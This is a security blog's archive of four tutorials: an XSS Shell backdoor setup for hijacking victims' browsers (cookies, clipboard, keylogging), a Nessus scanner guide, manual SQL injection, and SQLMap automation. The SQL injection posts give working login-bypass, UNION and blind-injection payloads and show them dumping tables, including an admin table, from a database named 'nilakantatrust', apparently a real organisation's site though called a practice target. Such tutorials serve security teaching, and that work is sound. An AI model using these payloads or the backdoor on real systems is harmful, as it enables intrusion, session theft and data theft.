Author Archives: kamalb

Advanced Exploitation using XSS-SHELL

Before getting into XSS Shell, let us recollect few basics of XSS (Cross Site Scripting). XSS is one of the most common vulnerability that exists in many of the web applications today. XSS is a technique through which an attacker tries to compromise the web application by executing a malicious script. The attacker does this by breaking the Same-Origin policy of the web application. Same–Origin policy defines that the script which is coming from the foreign site or the script that doesn’t belongs to the same domain (i.e document.domain) should not be processed by the application.

Once if an attacker finds XSS in a web application, he can perform different kinds of attacks.
– Stealing Credentials
– Stealing Session tokens
– Defacing the Website
– Causing DOS
– Installing Key loggers and many more….

Cross-Site-Scripting exists in three different forms:
– Reflected
– Stored
– DOM Based

Reflected XSS:
This kind of vulnerability exists in the application that uses dynamic pages to display the content to the user. Normally these applications take the message into a parameter and renders back to the users.

For Example, consider the URL: http://www.[sample].com/error.html?value=learn+hacking

This shows the message learn hacking in the response of the application. Which means the application is extracting the message from the URL, processing it and displaying it to the user. So the URL processes user supplied data and inserts it into the server’s response. If there is no proper sanitization then the application is vulnerable to Reflected XSS.

The URL can be crafted as: http://www.[sample].com/error.html?value=<script>alert(1)</script>

When you click on the above URL it executes the script and pops up an alert box.

Stored XSS:
This type of vulnerability exist in applications which takes input from the user, store it and later displays to other users. For example, consider Facebook application which allows commenting on any picture or status update and then displays to all other users. If the application doesn’t sanitize the input properly then an attacker can write a script in the comment area, so that the users who visits or views particular page or post will be effected.

So Stored XSS consists of two things to do. Initially the attacker enters the malicious script into the application. Secondly the user visits the crafted page and the script is executed in the back-end without the knowledge of the user.

DOM Based XSS:
DOM stands for Document Object Model. It is quite different from the other two attacks described earlier. In DOM Based XSS when the user click on the crafted URL, server response doesn’t consist of attacker’s script. Instead the browser executes the malicious script while processing the response. This is because the Document Object Model of the browser has a capability to determine the URL used to load the current page. Script issued by the application may extract the data from the URL and process it. Then it uploads the content of the page dynamically depending upon the script executed through the URL.

XSS Shell

XSS Shell is a powerful tool developed in ASP .NET which runs as a XSS backdoor between the attacker and the victim. With XSS, attacker has only one shot to execute any kind of attack on victim. Once the victim navigates from the malicious page the attacker’s interaction or the communication with the victim ends, whereas using XSS Shell help the attacker to open an interactive channel with the victim and communicate with him by sending its commands. Here, even if the victim navigates from the vulnerable/malicious page the attacker can continue his communication as the XSS Shell re-generates the page.

The interactive shell or the communication channel which was established by the attacker with the victim is called “XSS Tunnel”. XSS Tunnel is used for tunneling the HTTP Traffic between two machines opened by XSS. Technically it is developed using AJAX and that can send requests and receive responds and has an ability to talk cross-domain.

Attack Process:
1. Setup XSS Shell Server.
2. Configure XSS Tunnel to use XSS Shell Server.
3. Inject malicious script into a vulnerable Website.
4. Launch XSS Tunnel and wait for victim.
5. Configure the browser or tool to use XSS Tunnel.
6. When victim visits the vulnerable page, start using XSS Tunnel.

How XSS Shell works:

xss shell process 1

As shown in the figure, initially attacker establishes a connection with the XSS Shell and injects malicious script into the web Application using Stored or Reflected XSS. Once the victim clicks or visits the vulnerable application with the malicious script a request will be sent to the XSS Shell Server. On the basis of the request server establishes a channel to interact with the victim.

xss shell process 2

Once a channel has been created between the victim and XSS Shell Server, attacker can control the communication through XSS Shell Admin Interface. XSS Shell Admin Interface is nothing but a GUI environment which provides definite set of commands which the attacker can execute to perform certain actions.

On executing a command, necessary function or the script will be called at XSS Shell Server level and it is sent to the victim. The script will be processed and executed at victim browser and it sends corresponding results to the XSS Shell Server. XSS Shell Server stores the results in MS-Access database which is normally used by it to store the data. Attacker can extract the results from the database and look at it whenever he wants.

Some of the commands that XSS Interface provides are:
– Get Cookie
– Get Current Page
– Get Clipboard
– Get Key-logger data
– Crash browser

One more advantage of using XSS Shell is, it is an Open Source and quite easy to implement new commands.

– An IIS Server where you can host .asp files.
– Microsoft Access database (.mdb)
– A Website which is vulnerable to XSS
– A vulnerable site to perform attack

Setting up the environment:
– Download the XSSShell from:
– Configure IIS to host the site
– Installation
– Configure XSS Shell

Configuring IIS:
In-order to configure IIS in windows 7 or above, follow the steps given below:

1. Click on Start Menu and goto Control Panel.
2. Click Programs and then click on Turn windows features on or off.
3. A new Windows Features dialog box will appear. Expand Internet Information Services.
4. Select default features that has to be installed with IIS.
5. You can expand the additional categories and install any additional features if required.
6. It is recommended to install additional features if you want to use IIS for evaluation purpose.

Now IIS has been configured in the machine and can be accessed using http://localhost/

IIS 7 default page

XSS Shell uses ASP .NET and MS-Access database. So just make sure that you have installed .NET framework and MS-Access db on your machine.

Configuring XSS Shell Admin Interface:
– After downloading the file, extract the file and you can see two folders – XSSshell & XSSTunnel.
XSSshell is admin interface and you need to configure it in your machine. Copy XSSshell folder to your web server.

xss shell folder

– You can see a sub-folder named db in the XSSShell folder as shown in the above image. Copy that to a secure place because XSSshell stores complete data in that db, whatever it is either victim’s session cookies or any other attacked data that belongs to victim.
– After moving the db folder to a secure place, configure the path in db.asp file under XSSshell/admin folder. So that the interface can know where the db is and interact with it.

xssshell source 1

– Edit the path to the location such that it should point to the place where db folder is present in your machine.xssshell source 2– The above image, shows default password to access shell.mdb file. You can edit to whatever you want.
– Now you can access admin interface by using the localhost url or the domain name that you have given. Ex: http://localhost/xssshell (or)
– By default it uses port 80, but if you change the port number while configure the domain you need to access the site by embedding the port number.

Configuring XSS Shell:
– Open xssshell.asp from XSSshell folder.
– Configure the server path. i.e to the place where XSSshell folder is located.

xssshell source 3

– Above figure shows the configuration of server path in xssshell.asp file. Edit he parameter SERVER to the place to the location of XSSshell folder in your machine.
– Now access your admin interface from the browser, which would contain three sections.

xss shell admin interface

As mentioned earlier XSSshell has pre-defined commands which make attacker’s life easy to perform any attack on the victim. Commands section contains all the commands supported by the shell. As it is a open source you can edit it and add your own functionalities there.

Victims section shows the list of victims.

Logs show the list of actions performed on the victims.

XSS Tunnel:

XSS Tunnel is just like a proxy tool which runs on attacker machine and captures traffic through xss channel on XSSshell server. In-order to do this XSS Tunnel should be able to understand where XSSshell server is running. We can configure the XSSshell information (i.e where it is running) in XSS Tunnel from Options tab. Enter the server address and password. Then just to make sure it is working fine click on Test Server. You get a success message if the configuration is proper.

xss tunnel - connection success

Once done with configuration, click on Start XSS Tunnel on the top of the window.  Then you can see all the actions performed by the victim from XSS Tunnel’s Dashboard. The below image shows all the pages visited by the victim and actions performed.

xss tunnel - traffic capture


XSSshell is an interface or a tool which opens a gateway to the attacker through which he can perform various attacks on the victim without losing the connection once established.



Posted by on January 29, 2014 in web application hacking

1 Comment

Tags: , , ,

NESSUS Vulnerability Scanner – Basics

If you are looking for a vulnerability scanner, you might have came across several expensive commercial products and tools, with wide range of features and benefits. If a full featured free vulnerability scanner is on your mind, then it’s time to know about Nessus. The article covers installation, configuring and select policies, starting a scan, analyzing the reports using NESSUS Vulnerability Scanner.

Nessus was founded by Renuad Deraison in the year 1998 to provide to the Internet community a free remote security scanner. It is one of the full fledged vulnerability scanners which allow you to detect potential vulnerabilities in the systems. Nessus is the world’s most popular vulnerability scanning tool and supported by most of the research teams around the world.

The tool is free of cost and non-commercial for non-enterprises.  Nessus uses web interface to set up, scan and view repots. It has one of the largest vulnerability knowledge bases and because of this KB the tool is very popular.

Nessus supports wide range of operating systems that include Windows XP/7, Linux, Mac OS X, Sun Solaris, etc.

Key Features:

  • Identifies Vulnerabilities that allow a remote attacker to access sensitive information from the system.
  • Checks whether the systems in the network has the latest software patches.
  • Tries with Default passwords, common passwords, on systems account
  • Configuration audits.
  • Vulnerability analysis.
  • Mobile Device audits.
  • Customized reporting.

Installation & Configuration:

  1. You can download the Nessus home feed (free) or professional feed from Nessus website.
  2. Once you download the Nessus home tool, you need to register for generating an activation key.  The activation key will be sent to your email id. 
  3. Install the tool (Installation of nessus tool will be quite confusing and the installation guide comes handy).
  4. Open the Nessus in the browser, normally it runs on the port 8834 –
    http://localhost:8834/WelcomeToNessus-Install/welcome and follow the screen.
  5. Create an account with Nessus. 
  6. Enter the activation code you have obtained by registering with the Nessus website. Also you can configure the proxy if needed by giving proxy hostname, proxy username and password.
  7. Then scanner gets registered and creates the user account.
  8. Then downloads the necessary plugins (It takes some time for downloading the plugins). 
  9. Once the plug-ins are downloaded then it will automatically redirects you to a login screen. Provide the Username and password that you have created earlier to login.

Running the Tool:

Nessus gives you lots of choices when it comes to running the actual vulnerability scan. You’ll be able to scan individual computers, ranges of IP addresses or complete subnets. There are over 1200 vulnerability plugins with Nessus using which you’ll be able to specify individual or set of vulnerabilities to test for. In contrast to other tools Nessus won’t assume for explicit services running on common ports instead it will try to exploit the vulnerabilities.

One of the foundations for discovering the vulnerabilities in the network are:

  • Knowing which systems exist
  • Knowing which ports are open and which listening services are available in those ports
  • Determining which Operating System is running in the remote machine

Once you log into the Nessus using web-interface, you will be able to see different options like,

  • Policies –Using which you can configure the options required for scan
  • Scans -for adding different scans
  • Reports -for analyzing the results

Basic workflow of Nessus tool is to Login, Create or Configure the Policy, Run the Scan and Analyze the Results.


Policies are nothing but the vulnerability tests that you can perform on the target machine. By default Nessus has 4 policies.

Nessus policies

Above figure shows the default polices that comes with Nessus tool.

External Network Scan:

The policy is pre-configured in such a way that Nessus scans externally facing hosts, which provides services to the host. It scans all 65,535 ports of the target machine. It is also configured with Plugins required for web application vulnerabilities tests like XSS.

Internal Network Scan:

This policy is configured to scan large internal networks with many hosts, services, embedded systems like printers, etc… This policy scans only standard ports instead of scanning all 65,535 ports.

Web App Tests:

Nessus uses this policy to detect different types of vulnerabilities exist in the web applications. It has the capability to spider the entire web site and discovers the content and links in the application. Once the spider process has been completed then Nessus starts to discover the vulnerabilities that exist in the application.

Prepare for PCI DSS audits:

This policy consists of PCI DSS (Payment Card Industry Data Security Standards) enabled. Nessus compares the results with the standards and produces a report for the scan. The scan doesn’t guarantee for a secure infrastructure.  Industries or Organizations preparing for PCI-DSS can use this policy to prepare their network and systems.

Apart from these pre-configured policies you can also upload a policy by clicking on “Upload” or configure your own policy as per your scan requirement by clicking on “New Policy”.

Configuring the Policy:

  • Click on the policies tab on the top of the screen
  • Click on the New Policy button to create a new policy

Under the General settings tab select the “setting type” based on scan requirement, like Port Scanning, Performance scanning etc… Based on the type Nessus prompts different options that has to be filled. For example ‘Port Scanning’ has the following options

Nessus Port scanning options

Above figure shows configuring options of Port Scanning.

Enter the port scan range. By default Nessus scans all the TCP ports in /etc/services file. You can limit the ports by specifying it manually (like 20-30). You have different scanners like Nessus SNMP scanner, SSH scanner, ping remote host, TCP Scanner, SYN scanner, etc…. Enable by selecting the check box as per the scan requirement.

  • Enter the credentials for scan to use. You can use single set of credentials or multiple set of credentials if you have. You can also work it out without entering the credentials.
  • The plugins tab has number of plugins. By default Nessus will have all the plugins enabled. You can enable or disable all the plugins at a time or enable few from the plug-in family as per the scan you’d like to perform. You can also disable some unwanted plugins from the plug-in family by clicking on particular plug-in.

Nessus sub plugins

The above figure shows the sub-plugins for the plugin Backdoors.

In the above Figure the green one shows the parent plugin and the blue once shows the sub-plugins or the plugins under the plugin (backdoor). You can enable or disable by simply clicking on the enabled button.

  • In the Preferences, you are provided with a drop down box to select different types of plugins. Select the plugin based on the scan requirement and specify the settings as per the plugins requirement. Click finish once completed. For example: configure the database.

Nessus database settings plugin

The above figure shows the configuration of Database settings plugin.


Once you are done with configuring the policies as per your scan requirement, you need to configure the scan details properly. You can do it under Scan tab.

Under the Scan tab, you can create a new scan by clicking New Scan on the top right.  Then a pop up appears where you need to enter the details like Scan Name,  Scan Type, Scan Policy & Target.

  • Scan Name: The name that you are willing to give to the scan.
  • Scan Type:  You have options to RUN the scan instantly by selecting RUN NOW. Or you can make a template which you can launch later when you are willing to run. All the templates are moved under the TEMPLATE tab beside the SCAN tab.
  • Scan Policy: Select the policy that you have configured previous in the policies section.
  • Select Target: Enter the target machine which you are planning to test. Depending upon the targets Nessus takes time to scan the targets.


Once the scanning process has been completed successfully, results can be analyzed from RESULTS menu.

  • Once the scan has been completed, you can see the name of the scan under the results section. Click on the name to see the report.
  • Hosts: Specifies all the target systems that you have scanned.
  • Vulnerabilities: Displays all the vulnerabilities on the target machine that has been tested.
  • Export Results: You can export the results into difference formats like html, pdf, etc…  You can also select an individual section or complete result to export based on your requirement.

Let us try out an example now-

I have configured a policy named Basic Scan. We have many options while configuring or building the policy like port scanners, performance of the tool, Advanced etc.

Nessus port scanning settings for basic scan

The above figure shows configuration settings of Port Scanning for the policy Basic Scan.

You don’t need credentials now, so skip the credentials tab and move to Plugins tab. You need to configure the specific plug-in as per the scan requirement that you are willing to perform on remote machine.

Nessus plugins for basic scan

The above figure shows the plugins that I have enabled for the policy Basic Scan. I have enabled few plugins for windows machine scan.

Nessus scan configuration

The above figure shows the configuration of the Scan.

I have configured the scan to run instantly with the policy that I have created earlier. And the scan target specify the IP address I am willing to scan.

Once all the details has been entered click on Create Scan which shows the Scan is running as shown in the below Figure.

Nessus running scan

Once the scanning has been completed then you can see the results in Results tab. Below Figure shows the same.

Nessus results

Double clicking on the title displays the scan results.

Nessus scan result

The above figure shows the Hosts details. It includes all the targets that you have scanned during the test. Double clicking on the host address displays the vulnerabilities Nessus have identified during the test. You can also click on Vulnerabilities tab to check out the vulnerabilities.

Nessus vulnerabilities menu

The above figure shows the Vulnerabilities that Nessus found during its scan. Based on the Risk Nessus marks it as high, medium, info etc… Clicking on the Vulnerability gives you brief description of it.

For example let us go with Netstat portscanner, displays you the following information

Nessus port scan result

The above figure shows the ports opened in the target machine.

In the same manner you can analyze complete details by clicking on the vulnerabilities. Nessus also suggests the solutions or remedies for the vulnerabilities with few references.


Nessus is a tool which automates the process of scanning the network and web applications for the vulnerabilities also suggests solutions for the vulnerabilities that are identified during the scan.


Posted by on February 27, 2013 in web application hacking


Tags: , ,

SQL Injection exploitation and dumping the database

SQL Injection:

SQL Injection is a web based attack used by attackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used since a  long time. This attack takes advantage of improper coding of web applications, which allow an attacker to exploit the vulnerability by injecting SQL commands into the prior web application. The underlying fact that allows for SQL Injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username=’admin’ and password=’admin123′;

If the attacker knows the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin’– and without supplying any password. The query in the back-end looks like:

Select * from users where username=’admin’--’ and password=’xxx’;

Note the comment sequence (–-) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username=’admin’;

Hence the password check is bypassed and the attacker is logged into the app as admin.

Different types of SQL Injections:

SQL Injection can be classified into 3 types based on the way it is exploited : In-band, Out-band and Inferior.

1. In-band:

This is also called as Error-based or Union based SQL Injection or first order Injection. The application is said to be vulnerable to In-band when the communication between the attacker and the application happens through a single channel. I.e. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database. This is a straight forward technique. The application directly displays the retrieved data on the web pages.

Confirming the Vulnerability:

Below URL is In-band SQLI vulnerable practice site which I setup in my vmbox.

Accessing to the URL displays the home page as shown in the below image.

Sqlinjection demo

Now let us try to confirm the vulnerability by simply adding a single quote at the end of the URL:'

The above URL shows an error on the web page, saying that Error in your SQL Syntax. This is because of an extra single quote (‘) that we have entered through the URL into the query in the background. So by seeing the error we can understand that the URL is vulnerable to In-band SQLI. Below image shows you the error occurred due to concatenating the special character (‘).

Sqlinjection error

If single quote (‘) is blocked, then we can try using “or 1=1 –” or “and 1=1” at the end of the URL. or 1=1 -- (or) and 1=1 --

Above URL shows the same page that has been displayed while accessing the URL:

This is because the condition that we have entered at the end of the URL is always true.

Now try to access by entering the string “or 1=0–“or “and 1=0–”. So the URL looks like: or 1=0-- (or) and 1=0--

Now we will not be able to access the page, because the condition “1=0” is always false. Below image shows the page when accessed with false condition.

Sqlinjection confirmation

Then we can confirm that URL is vulnerable to SQLI.

The string listed in the below table can be used to confirm SQL Injection

or 1=1‘or 1=1“or 1=1or 1=1–‘or 1=1–“or 1=1–
or 1=1#‘or 1=1#“or1=1#  or 1=1/*‘or 1=1/*
“or 1=1/*or 1=1;%00‘or 1=1;%00“or 1=1;%00‘or’‘or
‘or’–‘or–or a=a‘or a=a“or a=aor a=a–
‘or a=a —“or a=a–or ‘a’=’a’‘or ‘a’=’a’“or ‘a’=’a’‘)or(‘a’=’a’

You can try all the combinations for string “or a=a” that we have tried for “or 1=1”….. Like #,–, /* etc…


Moving further, we can extract or dump the complete database by using “UNION” and “SELECT” commands.


We can find out DBMS type (MS-SQL, MYSQL, ORACLE) by using the unique functions of the appropriate database. For example to find out the database user, all the above databases have different syntax.

MS-SQL: user_name()
MYSQL: user ()
ORACLE: select user from dual;

So let’s try to find the DBMS of our SQLI vulnerable site. As a first trial I am entering “user_name()” at the place where we had “2”. union select 1,user_name(),3,4,5,6,7

Above URL gives an error saying “Function user_name doesn’t exist”. Which means the DBMS isn’t MS-SQL.

Find database in Sql injection

Above image shows that the DBMS isn’t MS-SQL. Now let’s try with “user ()” union select 1,user(),3,4,5,6,7

Above URL display the user name of the DBMS. So we confirm that the DBMS is MYSQL.

Sqli - fetch database username

Above image shows the database user name which proves that the DBMS is MYSQL.

So we can use all the MYSQL functions in the place of 2,3,5,7 and dump the database on the web page.


Let us try to find out the number of columns in the table using UNION.  The URL looks like: union select NULL

Displays an error in the page saying “Select statement having different number of columns” .Now we understood that there are more than one column in the table.

finding number of columns using sql injection

Image shows the error message occurred by accessing the web site using above URL (Using select NULL). So try adding one more NULL. union select NULL, NULL

Still if we are receiving the same error, then keep on adding the NULL to the query and try to find out number of columns in the table. union select NULL, NULL, NULL, NULL, NULL, NULL, NULL

The above string gives you the same page as the initial URL as the number of columns in the table is seven.

finding columns usingsl injection by using order by

Figure shows the page when accessed with above URL. (Using seven NULL’S).

We can also use “ORDER BY” to find out the number of columns in the table. order by 7--

So we can understand that there are seven columns in the table.

Now here is the trick. Where will we be able to see the extracted data from the database?

Just add a negative sign before the id value. Then the data appears on the web page straight away. union select 1,2,3,4,5,6,7

(Note: Negative sign (-) before 22)

Then the application displays some of the numbers on the web page.  Above URL displays 2,3,5,7 on the web page.

display content on web page using sql injection

Figure shows the numbers displayed on the web page.

Finding the version and getting the databases: union select 1,@@version,database(),4,5,6,7

finding version of database using sql injection

Figure display the database version “5.0” and the database “nilakantatrust”.

Extracting Tables from database:

Now let us try extracting all the tables from the database “nilakantatrust”. union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--

extract tables using sql injection

Figure shows all the tables dumped from the database “nilakantatrust”.

Information_schema is the table which contains meta-data, nothing but information about all the tables and columns of the database.

Extracting columns from the tables: union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--

extracting columns using sql injection
Figure displays all the columns of the tables in the database “nilakantatrust”.  We can look at all the columns and then dump the interesting columns like passwords, SSN, Credit card numbers etc…

2. Out-Band:

This kind of an attack uses two different channels for communication between attacker and the application. Modern DBMS has very powerful applications and their features go behind simply returning the data to the users. They can be instructed to send an e-mail and they can also interact with file system. All of these functionalities are very helpful for an attacker. Attacker establishes direct connection to the database through one channel to insert the data or the malicious string into the database. DBMS responds through new channel, like e-mails, or executing the commands using xp_cmdshell etc….

3. Inferred:

This is also known as Blind – SQL – Injection. Here the server doesn’t responds with any syntax error or other means of notifications. This is very similar to normal SQL Injection but when attacked server doesn’t send any data to the attacker. Attacker need to retrieve the data by asking true or false questions through SQL commands.

The attacker needs to execute his commands by observing the response of the application.  This makes exploiting a SQL Injection attack more difficult but not impossible.

Now let’s have some practice:  and 1=1 --

The above URL gives the same data as of original site.  and 1=0 --

Above URL shows an error on the web page, as I explained you previously. (In “in-band” type)


To find out the DBMS used by the application we need to make use of different pre-defined functions available for different databases

For example, To find out the user name of the database following syntax is used by different DBMS

  • MS-SQL: user_name()
  • Mysql: user()
  • Oracle: select user from dual

You can know the difference from the cheat-sheet available at

So, let us find out the DBMS using the above functions 😉

Accessing the below URL gives you a white page.

blind sql injection

Observe the white page in Figure which is different from the URL:

as we have seen the page previously. By observing this difference we can extract the DBMS type of the application.

Let us check whether the application is using MS-SQL:

In the above URL I am trying to add 1 to the id ‘21’ based on the condition. When we access the URL with ID=21 we get the page as shown in Figure (m) and when we access URL with ID=22 we get the home page as shown in Figure (a).

In the URL %2b indicates ‘+’ and %20 indicates ‘  ‘ (space). It is called URL encoding. When particular symbol is filtered we can pass those symbols by encoding using different encoding techniques available.

And the condition in the query is framed using “case” statement along with “user_name” (A pre-defined function in MS-SQL to return DB user name). If the function user_name() is found then the condition returns ‘1’ which makes the ID=22 else it returns ‘0’ and the Id remains ‘21’

finding database using blind sql injection

Figure shows page which confirms that the DBMS isn’t MS-SQL.  So, now let us check for “MYSQL”

Above URL shows the page with ID=22 which confirms that the DBMS is MYSQL.

Finding the version:

To find the database version we can use ‘substring’ function in MYSQL. Observe the below URL,1,1)=5--

If the database version is ‘5’ then the substring function returns ‘5’ (as we are trying to extract only one character), where we are comparing the resultant value with ‘5’. Then if we are able to see the home page, we can confirm that the database is something like 5.x.x version.

If the URL doesn’t pops up the home page, then we can try changing the comparing value to 4,3 etc…

To find the exact version of the database we need to compare the second character of the version. For example


So, by observing the responses of the application we can extract complete version of the database.

Finding the User Name of the database:

We can find out the user name of the database by using both ‘case’ statement and ‘substring’ function.,1,1)='a')%20then%200%20else%201%20end)--

Based on the responses of the application keep on changing the character in the function substr().
Once we get the first letter of the user name then move on to find out the second letter.

For example:

substr(user(),3,1)=’b’ ….

In this fashion, to find out a single character in the user name, we have to send more than 200 request will all possible ASCII characters to the server. This technique can be optimized we can extract a single character from the database with in 8 requests.


SQL Injection is a powerful attack technique which can be used to dump complete database of the application.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.



Posted by on January 7, 2013 in web application hacking

Leave a comment

Tags: , , , ,

Exploit SQL Injection through SQLMap Burp Plugin

SQL Injection:

SQL Injection (SQLi) is a web based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the prior web application.The underlying fact that allows for SQLi is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username=’admin’ and password=’admin123′;

If the attacker knows the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin’– and without supplying any password. The query in the back-end looks like:

Select * from users where username=’admin’--’ and password=’xxx’;

Note the comment sequence (–-) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username=’admin’;

Hence the password check is bypassed and the attacker is logged into the app as admin. SQL Injection can be tested in two ways – Manual Pen-Testing & Automation.

1) Manual Pen-Testing: This is the process of detecting & exploiting the vulnerability manually. We need to test the vulnerability manually by passing the malicious strings and exploit it. I’ll give a clear explanation of exploiting SQLi manually in my next post.

2) Automated: This can be done by running the tools. There are many tools to find and exploit the SQLi vulnerability, some of them are SQLMAP, ABSINTHE, SQL NINJA, The Mole, etc… . I would love to use some tool which can be attached to a proxy that I use in my work regularly. So I chose SQLMap plugin for burp.


SQLMAP is an open source penetration testing tool that helps in automating the process of detecting and exploiting SQL injection vulnerabilities and taking full access over the database servers. SQLMAP comes with powerful detecting engine, and many niche features for the penetration tester and wide range of switches lasting from database fingerprinting, data fetching from the database, accessing the underlying file system and executing the commands on Operating System via Out-of-band Connections.

Since SQLMAP is developed in python it is a portable application, meaning that it will work in any operating system that supports python.

SQLMAP burp plug-in:

When we audit a web application, we normally configure an intermediate proxy to have more control over the request and response parameters. SQLMAP plug-in is an add-on feature that we can configure to the burp through which we can redirect a URL or a request directly to the SQLMAP with a single mouse click.

Plug-in Setup:

1. Download the plugin zip file from the following URL:
2. Unzip the file and keep it in the same folder where burp proxy is located.
3. Then execute the following command to run the burp with plug-in.


Java –classpath burpplugins.jar:”burpsuite_v1.4.0.1.jar” burp.StartBurp


Java –classpath burpsuite_v1.4.0.1.jar;burpplugins.jar burp.StartBurp

*Replace the burpsutie with the appropriate version that you are using. In my case I am using burpsuite_v1.4.0.1.jar. We also need to download the SQLMAP tool as we need to supply the executable to the burp plug-in.

Setting up SQLMAP:

For Windows,
1. Download and Install python 2.7 –
2. Download sqlmap –
3. Unzip the file to sqlmap directory.

For Ubuntu or Linux, run the below commands from the terminal

> Sudo apt-get install python-tk python2.7
> git clone git://
> cd sqlmap
> wget
> unzip

Setting up the environment:

– If you are using OWASP broken web application, then simply access one of the vulnerable site from your local browser where you are running SQLMAP.
– If you don’t use OWASP broken web application, then you need to set up a virtual machine that has a web server to host the vulnerable web application.
– Configure another VM with ubuntu where the attacker runs SQLMAP

Configuring the Proxy:

– If you are using Mozilla Firefox, then go to Edit > Preferences > Advanced > Network > settings and select “Manual Proxy Configuration” by enabling the radio button. Run the HTTP proxy with local-host and the port in which the proxy is running.
– If you are using Chrome, then go-to settings > Show Advanced Options > Network > Change proxy Settings > Connections > Lan settings.

How to use the plug-in:

Once you load the plug-in, then it is very easy to make use of it. Run the burp proxy with loaded plug-in. In the “site map” tab under the “target” you can see the particular domain that you are trying to test for SQLI and all the crawled pages related to the domain. On the right side click on the URL that you want to test, you can see the request parameters of the URL in the bottom panel. Right click on the request parameters and you can see the option “Send to sqlmap” as shown in the figure below.

Forward URL To Sqlmap burp plugin

Then you can see a new window (SQLMap wrapper) that will allow you to configure sqlmap. Below Image gives you a clear view of the wrapper.

sqlmap plugin window

Now lets have an over view of configuration features of the wrapper. In the “Target” text box specify the URL that you are willing to test. (Normally it will be filled by default as you have sent the request parameters previously, if needed you can change the URL).

Specify the method on which the domain is accessible (GET/POST).  In the “Bin-path” give sqlmap executable.

If you are aware of the DBMS of the web application, specify the database by selecting one of the options listed in the dropdown list. By default “auto” is selected which means that the SQLMAP wrapper tries with all the databases listed in the dropdown list to find out the database used by the application.

You can enumerate the database users, passwords, roles, privileges, databases etc by selecting the appropriate option from the Action drop down list. By default it is set to “auto” which means it will try to enumerate all the options listed in the drop down list in the sequential order.

If you are aware of the databases, users, tables, or columns, you can enumerate it by simply specifying it in the Database options.

Tampers are a kind of special characters or symbols that you are willing to insert into the query while pen-testing the application.

Once we configure the SQLMAP click on the “RUN”, this will open a new tab with execution of the program with the configuration that you have given to the wrapper or the SQLMAP. We can make any number of simultaneous execution tabs with difference instances. Below image shows the output tab.

Sqlmap output

Bored with theory, now lets see an example, the below URL is a vulnerable site for practicing the SQLI. You can also find the SQLI practice URL’s by goggling.

Id parameter in the above URL is vulnerable to SQLI; lets find it out through our SQLMAP wrapper (Burp suite plug-in).

Open the URL in the browser for which the proxy has been configured. In the proxy (burp) go to the “site map” and click on the URL and send it to the sqlmap by right clicking on the response parameters of the website, as I mentioned previously. Figure below shows you the wrapper opened for the above mentioned URL.

sqlmap plugin settings

The target specifies the URL we are testing, cookie specifies the cookie or session id.  Wrapper automatically identifies the positions in the URL where SQLI can be injected and specifies list of the parameters in “Parameters to test” text area (in our case we have only one possibility for injection which is “id” parameter).

In this example I have configured the SQLMAP wrapper to enumerate the list of databases that are configured in the backend database.

burp plugin sqlmap output

Above figure shows you the output tab which intend displays you how the plug-in tried to exploit the SQLI vulnerability in different ways

We can see that initially the wrapper tried to exploit the vulnerability by using “Boolean-based blind SQLI” by using AND operator. The payload shows how the tool tried to exploit the vulnerability. Here we can see the payload: id=22 AND 4626=4626, which is equivalent to the following URL: AND 4626=4626

As the URL is always true, the above URL returns the same page as of the original URL.

In the second trail it tried “error-based SQLI”. Later by using UNION operator.

Retreive database with sqlmap

From the above figure  we can observe more server details like web server, Operating System, back-end DBMS.

“Information_schema”  and “nilakantatrust” are the two databases that are used by the web application.

Now let us try to enumerate all the tables and the columns of the tables from the above databases.  To do so configure the SQLMAP wrapper Action field with the option “Enumerate database tables and columns”.  Below Figure shows you the same.

extract tables and columns using sqlmap

Below figure shows us the tables of the database “nilakantatrust”.

extracted tables and columns

Let us see the columns of these tables. Figure below shows the columns and their data types of two tables “est_notice” and “est_news” of  nilakantatrust database.

columns retreived using sqlmap

We can also dump complete database by selecting the option “dump dbms databases”.  And also store complete data into a file by using the option “save to file” in the output tab.

sqlmap output to file

Above figure shows the dumped data of the table “est_admin” from “nilakantatrust” database and storing it into a file.


SQLMAP is a powerful tool which is used to automate the process of detecting and exploiting the SQLI.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.


Posted by on December 17, 2012 in web application hacking

1 Comment

Tags: , , , ,